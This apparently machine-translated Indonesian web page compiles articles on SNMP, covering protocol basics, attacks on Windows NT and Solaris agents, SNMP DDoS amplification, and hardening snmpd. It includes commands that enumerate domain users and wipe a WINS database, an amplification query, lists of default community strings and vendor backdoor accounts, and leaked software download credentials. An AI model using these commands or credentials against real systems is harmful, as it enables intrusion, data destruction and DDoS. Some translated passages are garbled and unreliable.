serangan jaringan protokol snmp dan metode perlindungan. protokol SNMP

Delphi , Internet dan Jaringan, Protokol



Semua sistem manajemen jaringan yang serius menggunakan yang sederhana protokol jaringan manajemen (Protokol Manajemen Jaringan Sederhana, SNMP). Faktanya, SNMP bukan hanya sebuah protokol, tetapi keseluruhan teknologi yang dirancang untuk menyediakan manajemen dan kontrol atas perangkat dan aplikasi di jaringan. Dengan bantuannya, Anda benar-benar dapat mengontrol perangkat apa pun yang terhubung ke jaringan komputer, seperti sensor pemadam kebakaran atau bahkan lampu lalu lintas. Tentu saja, SNMP dapat (dan secara aktif digunakan) untuk mengelola komponen jaringan: hub, server, router, dll. Dengan menggunakan informasi SNMP (seperti paket per detik dan tingkat kesalahan jaringan), administrator jaringan dapat lebih mudah mengelola jaringan kinerja dan mendeteksi dan menyelesaikan masalah jaringan.

Tiga blok bangunan SNMP adalah: Struktur Informasi Manajemen (SMI) Basis Informasi Manajemen (MIB) Protokol SNMP itu sendiri

Model manajemen SNMP

Agen dalam SNMP adalah modul perangkat lunak yang berjalan di perangkat terkelola. Agen mengumpulkan informasi tentang perangkat terkelola tempat mereka beroperasi dan membuat informasi ini tersedia untuk sistem manajemen jaringan (NMS) menggunakan protokol SNMP.

Protokol SNMP v1

SNMP diimplementasikan pada tahun 1988 di hampir semua lingkungan jaringan yang tersebar luas: TCP / IP, IPX / SPX, AppleTalk, dll. Konsep dasar protokol adalah bahwa semua informasi yang diperlukan untuk mengelola perangkat disimpan di perangkat itu sendiri - baik itu a server, modem atau router - dalam apa yang disebut Database Administratif (MIB - Basis Informasi Manajemen). SNMP sebagai protokol jaringan langsung hanya menyediakan sekumpulan perintah untuk bekerja dengan variabel MIB. Set ini mencakup operasi berikut:

  • get-request Digunakan untuk meminta satu atau lebih opsi MIB.
  • get-next-request Digunakan untuk membaca nilai secara berurutan. Biasanya digunakan untuk membaca nilai dari tabel. Setelah meminta baris pertama dengan get-request, get-next-request digunakan untuk membaca baris tabel yang tersisa
  • set-request Digunakan untuk mengatur nilai dari satu atau lebih variabel MIB.
  • get-response Mengembalikan respons untuk permintaan-permintaan, permintaan-berikutnya, atau permintaan set-permintaan
  • perangkap Pesan pemberitahuan tentang peristiwa seperti restart dingin atau hangat atau "jatuh" dari beberapa tautan.

Untuk mengontrol pengoperasian perangkat jaringan, Anda hanya perlu mengakses MIB-nya, yang terus diperbarui oleh perangkat itu sendiri, dan menganalisis nilai beberapa variabel.

Format Pesan

Pesan SNMP terdiri dari 2 bagian: nama komunitas (community name) dan data (data). Nama komunitas menunjuk lingkungan akses untuk kumpulan NMS yang menggunakan nama ini. Bagian informasi dari pesan berisi operasi SNMP spesifik (dapatkan, setel, dll.) dan operan terkaitnya. Operan menunjukkan implementasi objek yang termasuk dalam transaksi SNMP tertentu.

Struktur Manajemen Informasi. RFC 1208

Menentukan logika untuk pengalamatan informasi saat berinteraksi dengan agen dan manajer SNMP. Sintaks dijelaskan oleh aturan abstrak Abstrak Sintaks Notasi Satu, ASN.1.

Basis Informasi Manajemen (MIB, MIB-II). RFC 1213

MIB adalah sekumpulan variabel yang menjadi ciri keadaan objek kontrol. Variabel ini dapat mencerminkan parameter seperti jumlah paket yang diproses oleh perangkat, status antarmukanya, waktu pengoperasian perangkat, dan sebagainya. Setiap produsen peralatan jaringan, selain variabel standar, termasuk parameter khusus perangkat apa pun di MIB (di subpohon perusahaan swasta).

Bagaimana pengalamatan di MIB ke beberapa variabelnya?

Berdasarkan strukturnya, MIB adalah sebuah pohon, setiap elemen memiliki pengenal numerik dan simbolik. Nama variabel termasuk jalur penuh sampai dengan dari root elemen root.

Misalnya, waktu pengoperasian perangkat sejak reboot disimpan dalam variabel yang terletak di bagian sistem nomor 3 dan disebut sysUpTime. Dengan demikian, nama variabel akan menyertakan seluruh path: iso(1).org(3).dod(6).internet(1).mgmt(2).mib-2(1).system(1).sysUpTime( 3); atau dalam bahasa angka: 1.3.6.1.2.1.1.3. Perlu dicatat bahwa dalam hal ini simpul-simpul pohon dipisahkan oleh titik-titik.

Ada cabang MIB standar yang terkait dengan bagian kontrol mgmt yang umumnya didukung oleh semua perangkat jaringan.

Pengujian jaringan dengan SNMP

Menggunakan SNMP, Anda dapat melakukan berbagai pengujian fungsionalitas perangkat jaringan, yang sekali lagi ditentukan pada perangkat itu sendiri. Ini berguna, karena sekadar mengamati statistik seringkali tidak memberikan gambaran lengkap tentang apa yang sedang terjadi.

Jadi, misalnya, untuk bagian yang terkait dengan antarmuka Ethernet, tes TDR (Time-domain reflectometry) ditentukan, yang memungkinkan Anda menentukan perkiraan jarak ke kesalahan pada kabel koaksial. Untuk menjalankan pengujian TDR, Anda perlu menyetel nilai variabel ifExtnsTestType (1.3.6.1.2.1.12.2.1.4) yang berisi jenis pengujian yang akan dilakukan sehingga berisi pengidentifikasi pengujian TDR di MIB: 1.3.6.1.2.1.10.7.6.1.

Hasil pengujian akan menjadi, pertama, nilai variabel ifExtnsTestResult (1.3.6.1.2.1.12.2.1.5), yang mencirikan hasil pengujian:

  • tidak ada hasil
  • kesuksesan
  • dilakukan
  • tidak didukung
  • tidak dapat berlari
  • dihentikan
  • akhir yang buruk

Dan kedua, nilai variabel ifExtnsTestCode (1.3.6.1.2.1.12.2.1.6) akan berisi pengenal variabel MIB yang berisi hasil pengujian. Hasil pengujian didefinisikan sebagai interval waktu dalam satuan 100-ns antara awal pengiriman paket pengujian dan pendeteksian tabrakan pembawa. Pada prinsipnya, jarak yang dibutuhkan dapat ditentukan dari nilai ini.

Inovasi mendasar dalam SNMPv2 adalah manajer jaringan dapat bertindak sebagai manajer, agen, atau manajer dan agen sekaligus. Konsep ini memungkinkan pengguna untuk mengimplementasikan SNMP dalam struktur hierarkis di mana manajer lokal melapor kepada manajer menengah, yang pada gilirannya dikendalikan oleh manajer tersebut. level tertinggi. Banyak ruang dikhususkan untuk masalah keamanan SNMP, mungkin titik paling rentan dari protokol.

keamanan SNMP. RFC 1352.

Salah satu kekurangan SNMP v1 yang paling mencolok adalah kurangnya perlindungan data lanjutan pada tingkat yang diperlukan untuk jaringan perusahaan.

Seperti yang dikatakan Mike Warfield: "SNMP adalah singkatan dari Security Not My Problem".

Dalam SNMPv1, perlindungan informasi administratif ditafsirkan terlalu sederhana: didasarkan pada penggunaan nama komunitas (Nama Komunitas), yang berada di header SNMP, membawa semua fitur perlindungan pesan. Obat ini(dikenal sebagai protokol trivial) mengharuskan agen dan manajer untuk mengenali nama bersama yang sama sebelum melanjutkan operasi administrasi jaringan. Akibatnya, banyak administrator jaringan membatasi pekerjaan mereka hanya pada fungsi pemantauan, melarang penerbitan perintah SET yang dapat mengubah parameter konfigurasi. perangkat jarak jauh. Hal ini membuat pengguna menghindari perintah SET: fitur keamanan primitif seperti nama kolektif dapat memungkinkan orang yang tidak berwenang untuk mengubah pengaturan tanpa diketahui pengguna. Selain itu, semua kritis informasi penting ditransmisikan secara jelas, sehingga bahkan snmp sniffer tersedia di Internet

Dalam hal ini, proposal dikembangkan untuk meningkatkan keamanan dalam SNMPv1, yang dipresentasikan pada Juli 1992; mereka membentuk dasar kerangka keamanan untuk SNMPv2.

Standar keamanan SNMPv2 menentukan metode untuk otentikasi (DAP - Digest Authentication Protocol) dan kerahasiaan (SPP - Symmetric Privacy Protocol) dari informasi administratif. Ini didasarkan pada konsep pihak - seperangkat parameter keamanan unik, yang mungkin termasuk lokasi jaringan, otentikasi, dan protokol privasi yang digunakan antara agen dan manajer.

Tantangan Implementasi SNMPv2

SNMPv2 menjanjikan manfaat keamanan dan performa yang penting bagi pengguna. Tetapi beberapa perusahaan pasti akan muncul dengan idenya sendiri, terutama dalam hal perlindungan dan komunikasi antar manajer. Selain itu, perusahaan yang telah berkembang Kegunaan MIB mereka di lingkungan SNMPv1 tidak mungkin terburu-buru merilis produk di bawah SNMPv2.

Tidak diragukan lagi, pengguna pasti ingin memiliki produk berbasis SNMPv2. Tetapi faktanya adalah banyak orang telah berinvestasi terlalu banyak dalam versi SNMPv1 untuk membuangnya begitu saja dan memulai dari awal. Penulis SNMPv2 meramalkan hal ini dan melanjutkan dari transisi bertahap ke teknologi baru. Ada dua cara untuk mempertahankan SNMPv1: agen resmi dan manajer dwibahasa. Agen Resmi mengonversi format SNMPv1 ke dan dari pesan SNMPv2.

Pilihan lainnya adalah pengelola dwibahasa yang mendukung kedua protokol (SNMPv1 dan SNMPv2) secara bersamaan dan tidak memerlukan konversi. Manajer SNMP bilingual menentukan apakah agen dalam format versi 1 atau versi 2 dan berkomunikasi dalam dialek yang sesuai. Dengan demikian, pilihan versi protokol harus transparan ke perangkat penerima.

Sayangnya, SNMP versi kedua belum disetujui, sehingga ada kebingungan dan kebimbangan di kamp manajemen jaringan.

Implementasi Agen dan Manajer yang Tersedia

http://www.microsoft.com/smsmgmt/
MS SMS Netmon

http://www.winfiles.com/apps/98/net-manage.html
sekumpulan berbagai agen dan manajer untuk Win95.

Epilog menawarkan perangkat lunak yang mengimplementasikan dukungan SNMP, termasuk:

  • Envoy, solusi SNMP portabel Epilog yang ringkas, cepat, dan portabel untuk OEM
  • Utusan, kompiler SNMP MIB yang memungkinkan pelaksana SNMP memperluas variabel SNMP standar untuk mendukung ekstensi ke MIB di setiap perangkat yang dikelola;
  • Ambassador, implementasi portabel lengkap dari agen pemantauan jarak jauh RMON (FastEthernet).
  • Fitur IBM Netview for AIX dari SystemView menyediakan manajemen terdistribusi atau terpusat dari jaringan heterogen yang besar.
  • ACE*COMM WinSNMP mendukung SNMPv1 & SNMPv2u di v2.0 dari implementasi Win16 dan Win32 WinSNMP yang terdepan di industri.
  • Digital Unix POLYCENTER Manager di NetView menyediakan manajemen klien/server dari jaringan perusahaan multivendor.
  • Alat PowerFlag adalah agen untuk UPS MIB dari catu daya tak terputus Victron B.V.
  • WS_Ping ProPack v.2.10 memungkinkan melihat tabel MIB, menentukan subtree. Untuk mengunduh versi terbaru dari server Ipswitch, Anda dapat menggunakan data berikut:
    • Nama Pengguna: 0000037181
    • Kata sandi: CQWSC
    • Nomor Seri: WP-101333
  • Implementasi yang Tersedia Secara Terbuka
  • Agen CMU SNMP (sumber)
    • agen yang mendukung SNMPv1 dan SNMPv2u
    • aplikasi berbasis baris perintah angka yang mendukung SNMPv1 dan SNMPv2u.
    • Kit Pengembangan SNMP Universitas Carnegie-Mellon mendukung SNMPv1/v2
  • NetSCARF adalah Fasilitas Pengumpulan dan Pelaporan Statistik Jaringan. Ini memungkinkan ISP untuk mengumpulkan dan melaporkan data tentang bagian Internet mereka, mendukung SNMP versi 1 dan USEC.
  • Scotty adalah ekstensi manajemen jaringan untuk Tool Command Language (Tcl) yang mencakup implementasi portabel dari protokol SNMPv1, SNMPv2c, dan SNMPv2u. Ekstensi Scotty Tcl mencakup platform manajemen jaringan (Tkined) yang menyediakan browser MIB, editor peta jaringan serta skrip pemantauan status, pemecahan masalah, penemuan jaringan, dan pemfilteran acara.
    • snmptcp v1.3 adalah platform yang dapat diperluas untuk aplikasi manajemen yang mengimplementasikan SNMPv1, SNMPv2c, dan SNMPv2u.
    • Paket berjalan di bawah Sistem X Window pada UNIX dan dibangun dari Tool Command Language (Tcl7.3/Tk3.6).

Serang pada Windows SNMP.

Layanan berjalan pada port UDP berikut (/etc/services)

  • snmp 161/udp snmp
  • snmp-trap 162/udp snmp

Kode Perusahaan Swasta Manajemen Jaringan SMI yang Menarik:

Awalan: 1.3.6.1.4.1.

  • 2 IBM
  • 4 Unix
  • 9 cisco
  • 32 Operasi Santa Cruz
  • 42 Sistem Mikro Matahari

Distribusi kecil pemindai port UDP di bawah Windows, manajer SNMP, serta kurangnya pengetahuan tentang protokol itu sendiri, tampaknya, adalah satu-satunya alasan untuk sejumlah kecil serangan pada perangkat yang dikendalikan oleh SNMP v1, karena kesalahan serius terjadi pada implementasi protokol ini di beberapa sistem operasi. Konfirmasi ini terus bermunculan di milis bugtraq.

Kerentanan dalam konfigurasi Layanan SNMP Windows NT standar.

Memungkinkan Anda mengonfigurasi parameter jaringan dari jarak jauh yang memengaruhi keamanan dan berfungsinya sistem dengan benar (jika administrator sendiri yang memulai Layanan SNMP)

Dalam konfigurasi default, layanan SNMP merespons komunitas default (nama) "publik", yang memiliki izin baca dan tulis. Community adalah nama yang memiliki fungsi yang sama dengan login dan password dalam sistem.

Protokol SNMP menyediakan dua tingkat izin: baca-saja dan baca-tulis, tetapi sebelum Windows NT SP4, Layanan SNMP tidak mengizinkan komunitas dikonfigurasikan untuk akses non-baca-tulis!

Jika Anda mencoba mengamankan Layanan SNMP dengan mengganti nama komunitas untuk akses, maka sistem akan tetap tidak terlindungi dari cracker yang memiliki akun di mesin, karena parameter Layanan SNMP ada di registri dan tersedia untuk dibaca oleh semua pengguna. Layanan SNMP Windows NT juga memiliki kemampuan untuk membatasi akses ke daftar alamat IP. Sekilas, ini memungkinkan Anda untuk melindungi diri dari serangan oleh sistem yang tidak dikenal, tetapi ini bukan masalah bagi cracker (yang perlu dipahami oleh administrator mana pun), karena protokol SNMP menggunakan protokol UDP untuk pertukaran informasi, dan ini adalah koneksi tanpa koneksi protokol, jadi spoofing alamat keluar dimungkinkan (tetapi untuk ini Anda harus mengolah kembali sumber manajer SNMP di bawah Unix dan mempelajari spoofing UDP)

Operasi "set" SNMP (memungkinkan Anda untuk mengubah nilai variabel) dapat dilakukan dengan mengubah alamat pengirim ke salah satu, karena respons tidak diperlukan. Namun, jika pembatasan alamat IP tepercaya diaktifkan, Anda harus menemukan akun di sistem yang diserang dan mengekstrak informasi tepercaya dari registri.

Berkat Layanan SNMP Windows NT yang dikonfigurasi secara default, kami dapat mengekstrak informasi berikut menggunakan manajer SNMP:

  • nama domain LAN Manager
  • daftar pengguna
  • daftar saham
  • daftar layanan yang berjalan
  1. Buka HKLM\System\CurrentControlSet\Services\SNMP\Parameters\ExtensionAgents
  2. temukan nilai yang berisi SOFTWARE\Microsoft\LANManagerMIB2Agent\CurrentVersion
  3. dan menghapusnya.
  • daftar koneksi TCP aktif
  • daftar koneksi UDP aktif
  • daftar antarmuka jaringan dan alamat IP dan perangkat keras yang terkait
  • tabel perutean IP dan tabel ARP serta sejumlah statistik kinerja jaringan.

Dengan mengatur variabel, cracker dapat memodifikasi tabel roaming, tabel ARP, mematikan antarmuka jaringan, merobohkan penting pengaturan jaringan ketik IP default, waktu paket untuk hidup (TTL), penerusan IP (memungkinkan cracker untuk mengarahkan ulang lalu lintas jaringan). Ini sangat berbahaya jika mesin yang diserang adalah firewall.

Anda tidak perlu jauh-jauh mencari contoh, misalnya jika mesin adalah pengontrol domain atau server, tetapi Anda bisa mendapatkan daftar semua pengguna di domain dengan C:\NTRESKIT>snmputil walk public .1.3.6.1 .4.1.77.1.2.25 perintah

Jika Anda ingin menghapus semua entri di database WINS (menyebabkan WinNT mogok), Anda dapat melakukannya dengan menjalankan ~$snmpset -v 1192.178.16.2 public .1.3.6.1.4.1.311.1.2.5.3.0 a 192.178.16.2 dari Kit pengembangan CMU SNMP di bawah Unix.

Ada juga detail yang sangat aneh saat menyetel nama komunitas SNMP di Windows NT 4.0 (SP3). Jika layanan diaktifkan dan nama tidak dikonfigurasi, maka nama apa pun akan memberikan hak baca/tulis. Ternyata, ini sudah tertera di spesifikasi SNMP (RFC 1157)!

Paket Layanan (SP4) keempat memberikan solusi berikut untuk masalah tersebut: menambahkan kontrol akses komunitas sebagai BACA SAJA, BACA TULIS, atau BACA BUAT. Namun, SP4 default untuk akses READ CREATE, yang masih memungkinkan mesin untuk diserang. Microsoft jelas peduli dengan kenyamanan WinNT bagi para peretas :)

Masalahnya ada di OS Solaris versi sebelum 2.6.

Berdasarkan ISS Security Advisory (2 November 1998), ada ancaman nyata di agen SNMP yang berjalan di sistem ini secara default untuk mendapatkan akses root, memanipulasi proses, dan pengaturan mesin.

Untuk mengakses informasi MIB, ada "undocumented community string" tersembunyi yang memungkinkan penyerang mengubah sebagian besar pengaturan sistem.

Sayangnya, komunitas ini sendiri tidak dipanggil, tetapi ISS Internet Scanner dan deteksi intrusi real-time ISS RealSecure dapat mendeteksi masalah ini, mis. Anda juga dapat melihat sumbernya.

Artikel Deskripsi SNMP (Protokol Manajemen Jaringan Sederhana) Bagian Protokol Internet dan Jaringan mungkin berguna untuk pengembang Delphi dan FreePascal.

Perkenalan

Artikel ini merupakan kelanjutan logis dari materi "", di mana prinsip dasar fungsi diberikan protokol ini. Tujuan dari pekerjaan ini
adalah menyoroti langkah-langkah yang diperlukan untuk memastikan tingkat perlindungan yang memadai
SNMP. Saya ingin meminta maaf kepada pembaca atas fakta bahwa beberapa
momen dari materi sebelumnya akan diulang - ini diperlukan untuk
gambaran lebih lengkap masalah ini. Informasi umum di sini
akan disajikan dalam volume minimum; untuk lebih memahami materi
Saya menyarankan Anda untuk membaca artikel pertama.

Ancaman

Masalah dengan protokol SNMP dimulai dengan versi pertama, saat mekanismenya
tidak ada yang namanya perlindungan. Siapa pun dapat mengetahui kata sandi dengan mudah
mendengarkan di jaringan. Namun setelah beberapa saat, versi kedua keluar, di mana,
sesuai dengan kebutuhan waktu, lebih serius
fungsi perlindungan. Secara khusus, hashing menggunakan MD5, enkripsi menggunakan
DES dan lainnya (lihat artikel pertama). Saat ini yang terbaru adalah SNMP versi ketiga, developer
yang tugas utamanya adalah memastikan keamanan. Namun, tidak semuanya
sangat lancar dengan keamanan bahkan di versi ketiga.
Ada 6 jenis ancaman SNMP:

  1. Pengungkapan: pelacakan pertukaran data antara agen dan
    stasiun kontrol untuk mengumpulkan nilai
  2. Menyamar
  3. Modifikasi: mengirim pesan untuk operasi dummy
  4. Modifikasi alur pesan
  5. Analisis lalu lintas jaringan
  6. Penolakan serangan layanan.

Pertimbangkan apa yang tampaknya menjadi SNMP versi ketiga yang paling aman
melawan jenis serangan ini.

Serang pada SNMPv3

  • Menyamar - bug diperbaiki, sistem
    memeriksa asal paket
  • Modifikasi - protokol memeriksa integritas menggunakan MD5
  • Ancaman Pengungkapan - Enkripsi dengan DES
  • Analisis lalu lintas - protokolnya diam
    RENTAN
  • Penolakan Layanan - RENTAN

Jadi, ternyata, versi 3 pun rentan terhadap beberapa jenis serangan. DI DALAM
khususnya, set utilitas uCD-snmp versi 5.0.1, 5.0.3, 5.0.4.pre2, yang
termasuk daemon SNMP, utilitas untuk polling dan nilai pengaturan
MIB, serta fitur berguna lainnya, rentan terhadap serangan denial of service.
melayani. Kerentanan ditemukan oleh Andrew Griffiths dan diumumkan
oleh iDEFENSE 2 Oktober 2002.
Solusi untuk masalah rencana semacam itu hanya bisa berupa pembaruan rutin
perangkat lunak.

Salah satu masalah paling umum bahkan hingga hari ini adalah kata sandi.
(string komunitas) secara default. Sekali lagi, saya ingin menunjukkan bahwa
pengaturan default HARUS diubah. Solusinya adalah dengan hati-hati mempelajari halaman manual untuk file-file berikut:
snmp.conf, snmp_config, snmpcmd, yang berisi informasi tentang
Konfigurasi SNMP dan operasi file. Bahkan dengan perubahan sederhana nilai oleh
default "publik" ke lebih banyak kata sandi yang rumit, penyerang tidak bisa lagi
dapatkan informasi tentang sistem Anda dengan utilitas sepele
snmpwalk. Banyak perangkat jaringan (switch, router WAN/LAN, modem, dan
beberapa sistem operasi) dikonfigurasi secara default dengan
mengaktifkan SNMP dan bahkan dengan akses rw(!). Konsekuensi dari kelalaian tersebut
mudah diprediksi. Ini daftar kecil, misalnya, perangkat dengan
kata sandi bawaan:

3com Beralih 3300 (3Com SuperStack II) - pribadi
- Router Cray MatchBox (MR-1110 MatchBox Router/FR 2.01) - pribadi
- 3com RAS (Kartu Router Akses HiPer) - publik
- Prestige 128 / 128 Plus - publik
- COLTSOHO 2.00.21 - pribadi
- PRT BRI ISDN router - publik
- CrossCom XL 2 - pribadi
- Batu Akik WaiLAN 700/800 - umum
- HPJ3245A Saklar HP 800T - publik
- ES-2810 DEPAN ES-2810, Versi 2.20 - publik
- Windows NT Versi 4.0 - publik
- Windows 98 (bukan 95) - publik
- Sun/SPARC Ultra 10 (Ultra-5_10) - pribadi

Omong-omong, pada 16 Oktober, yang baru diterbitkan di milis bugtraq
informasi tentang akses tidak sah ke AVAYA Cajun. komunitas SNMP
[email dilindungi]! memungkinkan akses penuh. Ada juga yang tidak berdokumen
akun diag/danger dan manuf/xxyyzz. Solusi untuk masalah tersebut adalah pembatasan akses rw, pelarangan akses
ke perangkat SNMP yang diaktifkan secara eksternal. Akses harus ditolak
Port SNMP untuk semua komputer nakal. Caranya cukup mudah,
cukup gunakan set aturan ipchains/iptables. Berikan saran tentang pengaturan
ipchains cukup sulit, karena Anda perlu mengetahui topologi jaringan lokal, dan
SNMP tidak diperlukan untuk workstation rumahan.

Untuk siapa saja administrator sistem, yang berhubungan dengan yang diberikan
protokol, diperlukan program yang akan menyederhanakan pekerjaan dengan SNMP. DI DALAM
MRTG dan SNMP::Monitor dapat disebutkan dalam hubungan ini. Menurut penulis paket tersebut
SNMP::Monitor, programnya memiliki keunggulan dibandingkan MRTG (yang
tepatnya, Anda bisa membaca di readme). Anda dapat mengunduh SNMP::Monitor dari
arsip packetstormsecurity.org. Berikut adalah beberapa fiturnya:

Meluncurkan proses persisten yang akan memantau jaringan
antarmuka dan masuk ke database
- menyediakan GUI melalui www
- menunjukkan statistik
- termasuk sistem kontrol akses data
dan sebagainya.

Pasti membutuhkan logging kegagalan layanan SNMP
ke host yang tidak sah dan analisis selanjutnya dari log. Jika Anda menghendaki
periksa kerentanan jaringan Anda, snmpsniff adalah program yang bagus,
pencegat lalu lintas. Anda dapat mengunduhnya dari www.packetstormsecurity.org/sniffers/snmpsniff-1.0.tar.gz .
Untuk memeriksa kekuatan kata sandi, Anda dapat menggunakan snmpbrute.c, yang mana
adalah kekuatan kata sandi yang cukup cepat.

Jadi, dalam karya ini, saya mencoba untuk menutupi masalah sejauh mungkin
operasi SNMP aman. Jika saya melewatkan sesuatu, saya akan berterima kasih
petunjuk. Terima kasih atas komentar yang mendorong saya untuk menulis
kelanjutan.

Dalam persetujuan dengan editor jurnal, saya menerbitkan artikel saya "Perlindungan terhadap DDoS dengan cara improvisasi. Bagian 3. Amplifikasi SNMP" dari terbitan 164-165 (Juli-Agustus 2016) terbitan jurnal "System Administrator".

Untuk berkontribusi pada perlindungan dunia maya global dari DDoS , tidak perlu membeli peralatan atau layanan yang mahal. Administrator server mana pun yang dapat diakses dari Internet dapat berpartisipasi dalam tujuan mulia tersebut tanpa investasi materi tambahan, hanya menggunakan pengetahuan dan sedikit waktu.


Pertimbangkan serangan DDoS amplifikasi menggunakan layanan SNMP.

SNMP amplifikasi

Inti dari serangan itu adalah untuk memulai respons yang meningkat berkali-kali lipat SNMP- meminta. Awalnya dirancang untuk mengotomatiskan pengambilan data tabular sambil meminimalkan jumlah paket yang dikirim DALAM JUMLAH BESAR- permintaan telah menjadi alat yang cukup efektif untuk melakukan DDoS serangan di tangan penyerang. Seperti pepatah RFC3416, GetBulkRequest Diimplementasikan dalam SNMP Versi 2, dirancang untuk dapat meminta sejumlah besar data, yang digunakan penyerang menggunakan server yang dikonfigurasi secara tidak benar di Internet.

Jika Anda menyetel jumlah maksimum baris yang dikembalikan dalam tabel menjadi 20000 dan menjalankan kueri terhadap server/perangkat yang salah dikonfigurasi:

:~$ snmpbulkget -c publik -v 2c -C r20000 192.168.10.129 1.3.6.1

jawabannya akan seperti ini:

iso.3.6.1.2.1.1.1.0 = STRING: "SNMP4J-Agent - Windows 2003 - x86 - 5.2"

< 290 baris dilewati>

iso.3.6.1.6.3.18.1.1.1.8.123.123.12.123.123.12.12.123.123.12.123.123.12 = Tidak ada lagi variabel yang tersisa di Tampilan MIB ini (Sudah melewati akhir pohon MIB)

Saat menjalankan tcpdump akan menunjukkan ukuran paket yang dikembalikan:

21:41:18.185058 IP 192.168.10.128.39565 > 192.168.10.129.snmp: GetBulk(25) N=0 M=20000 .iso.org.dod.internet

21:41:18.603553 IP 192.168.10.129.snmp > 192.168.10.128.39565:

Menanggapi permintaan dengan ukuran sekitar 70 byte, termasuk header, server mengembalikan respons dengan ukuran sekitar 10 kilobyte, hampir 150 kali lipat. Faktor penguatan tidak tetap dan dapat lebih tinggi (hingga 1700 kali) atau lebih rendah, tergantung pada jenis OS dan parameter konfigurasi perangkat. Jika, saat membuat permintaan seperti itu, gunakan substitusi IP- alamat pengirim ke alamat korban dan panggilan berintensitas tinggi ke server yang rentan - Serangan DDoS siap.

Menyebabkan

Inti dari masalahnya adalah, sebagai suatu peraturan, bukan pada kerentanan, bukan pada pengaturan jumlah nilai yang dikembalikan per GetBulkRequest, tapi itu maksudnya komunitas SNMP ditetapkan secara bawaan: publik-baca-saja atau lebih buruk, pribadi - baca-tulis. protokol SNMP versi 1 dan 2 didasarkan pada UDP, digunakan untuk pemantauan dan pengendalian,dan menggunakan nilai sebagai parameter autentikasi untuk akses ke peralatan yang dikendalikan masyarakat, yang dapat diatur ke read-only ( hanya baca ) atau dengan kemungkinan merekam ( Baca tulis ). Seringkali dalam sistem saat mengaktifkan layanan SNMP nilai default ditetapkan -publik untuk read-only dan pribadi untuk baca-tulis. Bahkan jika kita mengabaikan kemungkinan menggunakan server yang salah konfigurasi sebagai reflektor untuk memperkuat serangan SNMP, maka ancaman mendapatkan informasi tentang server, perangkat lunak yang diinstal di dalamnya dan versinya terlihat jelas saat menggunakan nilainyapublik bawaan untuk hanya baca. Akses istimewa hampir tak terbatas dengan hak administrator untuk perangkat memberikan komunitas baca-tulis pribadi . Bahkan jika tidak ada perubahan berbahaya yang dibuat, banyak permintaan menggunakan protokol SNMP dapat menyebabkan beban yang signifikan pada sumber daya komputasi dari server yang disurvei, sehingga memengaruhi kualitas layanan yang disediakan olehnya.

Perlindungan

Khusus untuk SNMP Rekomendasi untuk memastikan keamanan server atau peralatan jaringan dapat dibagi menjadi beberapa area berikut:

1. Arsitektur: izin untuk memproses permintaan hanya pada antarmuka yang tidak dapat diakses dari jaringan yang tidak dipercaya.

2. Perubahan masyarakat untuk sesuatu yang lebih sulit ditebak.

3. Pembatasan IP alamat stasiun kontrol.

4. Batas cabang PENGENAL, tersedia untuk diterima/diubah oleh SNMP.

5 . Minimalkan atau hentikan penggunaan masyarakat untuk membaca dan menulis.

6. Transisi ke SNMP versi 3 menggunakan opsi tambahan otentikasi dan enkripsi.

7. Nonaktifkan SNMP, jika tidak digunakan.

Bagaimana cara melakukan langkah-langkah ini pada sistem operasi yang berbeda?

Dalam file konfigurasi layanan snmp pengaturan berikut dikonfigurasi:

agentAddress udp:10.0.0.1:161#AKU P-alamat, protokol dan permintaan penerima portSNMP

Jika Unix- server pada dasarnya adalah router dan secara arsitektural memiliki beberapa antarmuka, untuk keamanan server harus dibiarkan dapat diakses melalui SNMP hanya antarmuka yang dapat diakses dari segmen tepercaya, tetapi tidak dari Internet. Nama masyarakat untuk akses diatur oleh parameter rocommunity (baca-saja) atau rwcommunity (baca-tulis), juga dimungkinkan untuk mengatur subnet dari mana akses diizinkan dan cabangnya PENGENAL, tersedia untuk pengoperasian subnet yang ditentukan dengan hak baris yang ditentukan masyarakat. Misalnya, untuk mengizinkan sistem pemantauan dari subnet 10.0.0.0/24 mengakses informasi pada antarmuka ( OID 1.3.6.1.2.1.2 ) menggunakan string akses Buat_Itu_Amankan dengan izin hanya baca, cuplikan konfigurasi akan terlihat seperti ini:

rocommunity Make_It_SeCuRe10.0.0.0/24 .1.3.6.1.2.1.2

Dalam kasus tertentu menggunakan berbagai Unix- sistem, baris di atas mungkin memiliki sintaks yang sedikit dimodifikasi karena penggunaan parameter yang berbeda dan struktur hierarki komponen file konfigurasi. Deskripsi terperinci dapat ditemukan dengan mengetikkan perintah

man snmpd.conf

Tetapi jika tugasnya adalah memastikan keamanan layanan secepat mungkin snmpd, sebelumnya dikonfigurasi secara tidak benar oleh pendahulu, Anda dapat mencadangkan snmpd.conf tambahkan batasan pada subnet sistem pemantauan ke file konfigurasi baru dan ubah masyarakat. Di Debian itu akan terlihat seperti ini:

#CD< direktori dengansnmpd.conf>

# mv snmpd.conf snmpd.conf.backup

# echo rocommunity MaKe_It_SeCuRe10.0.0.0/24 > snmpd.conf

# /etc/init.d/snmpd restart

Setelah itu, akses SNMP ke server hanya akan memiliki subnet 10.0.0.0/24 menggunakan yang baru masyarakat, sementara semua server yang belum berubah masyarakat ke yang baru, mereka tidak akan lagi menerima tanggapan atas permintaan, seperti penyusup.

Akan lebih aman untuk beralih menggunakan SNMPv3, di mana dimungkinkan untuk memvariasikan parameter otentikasi. Selain itu, tidak seperti versi 1 dan 2c, SNMPv3 memungkinkan Anda untuk mengenkripsi lalu lintas antara sistem pemantauan dan peralatan yang diinterogasi. Untuk membuat pengguna dengan hak baca-saja, autentikasi, dan enkripsi lalu lintas, ke file konfigurasi snmpd.conf perlu menambahkan:

createUser v3user SHA "some_AuThPaSs" AES some_privpass

authuser membaca v3user authpriv 1.3.6.1.2.1. 2

Dengan demikian, pengguna v3user akan mendapatkan hak hanya baca untuk melihat utas 1.3.6.1.2.1.2 melalui SNMP.

Anda dapat memeriksa kebenaran konfigurasi setelah memulai ulang layanan SNMP di server 192.168.10.128 dengan perintah dijalankan di klien:

$ snmpwalk -v 3 -A some_AuThPaSs -X some_privpass -a SHA -x AES -u v3user -l authPriv 192.168.10.128 1

Dalam hal ini, terlepas dari kenyataan bahwa seluruh pohon akan disurvei, mulai dari 1, server hanya akan mengembalikan cabang yang diizinkan 1.3.6.1.2.1. 2 , yang akan diatur dalam konfigurasi.

Saat menghentikan SNMP v1/v2c demi SNMPv3 itu juga perlu untuk menghapus dari file konfigurasi fragmen konfigurasi yang tidak terkait SNMPv3.

Jika SNMP untuk pemantauan servertidak digunakan, solusi paling tepat adalah menghapus paket snmpd.

